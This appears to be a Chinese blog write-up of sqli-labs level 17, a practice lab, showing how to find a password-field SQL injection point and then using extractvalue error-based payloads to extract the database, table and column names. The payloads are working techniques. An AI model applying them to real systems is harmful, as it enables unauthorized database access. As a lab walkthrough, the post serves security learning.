当前位置: 首页 > news >正文

sqli-labs第十七关——POST注入点

一:判断注入点

uname=1'&passwd=123
uname=1')&passwd=123
uname=1“)&passwd=123
uname=1”&passwd=123
uname=1&passwd=123

测试四个代码,页面均无反应 

所以我们更换注入点的位置 ,再密码框注入

uname=admin&passwd=1
uname=admin&passwd=1'*****
uname=admin&passwd=1"
uname=admin&passwd=1')
uname=admin&passwd=1")

第二行成功得到不同的回显,得出结论:注入点在密码栏, 是单引号字符型

尝试闭合:

uname=admin&passwd=1' or 1#

闭合成功 

二:开始注入

1.爆数据库

order by用不了,联合注入用不了,尝试报错注入

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,database()))#

 得到库名字security

2.爆表名

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))#

 

3.爆列名

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')))#

❀❀❀ 完结撒花!!!❀❀❀

http://www.xdnf.cn/news/576127.html

相关文章:

  • Spring Boot整合Redis
  • RestTemplate 发送的字段第二个大写字母变成小写的问题探究
  • 9-码蹄集600题基础python篇
  • leetcode 螺旋矩阵 java
  • 5-码蹄集600题基础python篇
  • 如何设计智慧工地系统的数据库?
  • 系统程序变更管理:确保IT环境稳定性和安全性的关键
  • Entity-Relationship Model(实体-关系模型)
  • FlashAttention:传统自注意力( Self-Attention)优化加速实现
  • 用户刷题记录日历——签到表功能实现
  • 基于 Guns v5.1 框架的分页教程
  • SseEmitter是什么
  • 卷积神经网络基础(十)
  • chrono类 根据duration 类的周期类型得到对应的周期名称
  • 预警功能深度测评:如何用系统降低设备突发故障率?
  • JavaScript常用事件
  • 第P10周:Pytorch实现车牌识别
  • 如何解决测试覆盖率与迭代速度的冲突问题?
  • 手搓四人麻将程序
  • 正大模型视角下的高频交易因子构建策略研究
  • 视频监控管理平台EasyCVR工业与公共安全监控:监控中心与防爆系统如何集成?
  • 【免杀】C2免杀技术(八)APC注入
  • 数字化转型到底是什么?如何更好的理解数字化转型
  • NOSQL之Redis群集部署
  • 基于Browser Use + Playwright 实现AI Agent操作Web UI自动化
  • 运行时runtime是什么?(程序在运行过程中所依赖的环境、资源管理机制以及动态行为的总和)(包括内存分配、异常处理、线程调度、类型检查、资源访问等)
  • ip地址冲突说明什么问题?ip地址冲突影响网速吗
  • torch.matmul() VS torch.einsum()
  • 2025上半年软考准考证打印入口已开放!
  • ubuntu24.04+RTX5090D 显卡驱动安装